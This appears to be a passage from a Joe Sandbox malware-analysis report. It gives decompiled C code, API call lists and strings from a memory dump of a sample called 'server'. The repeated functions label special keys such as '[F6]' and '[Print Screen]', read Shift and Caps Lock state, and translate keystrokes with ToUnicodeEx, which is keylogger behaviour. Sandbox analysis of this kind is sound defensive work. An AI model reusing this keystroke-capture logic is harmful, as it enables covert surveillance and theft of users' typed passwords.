				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F20]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b6a
0x00c85b71
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F20], xrefs: 00C85B6C

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8598E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8598E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Reset]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8598e
0x00c85995
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Reset], xrefs: 00C85990
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85BF2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BF2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F6]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85bf2
0x00c85bf9
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F6], xrefs: 00C85BF4
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85CAD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CAD(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Left Alt]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85cad
0x00c85cb4
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Left Alt], xrefs: 00C85CAF

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C25, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C25(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F9]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c25
0x00c85c2c
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F9], xrefs: 00C85C27
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85DAE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DAE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Print Screen]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
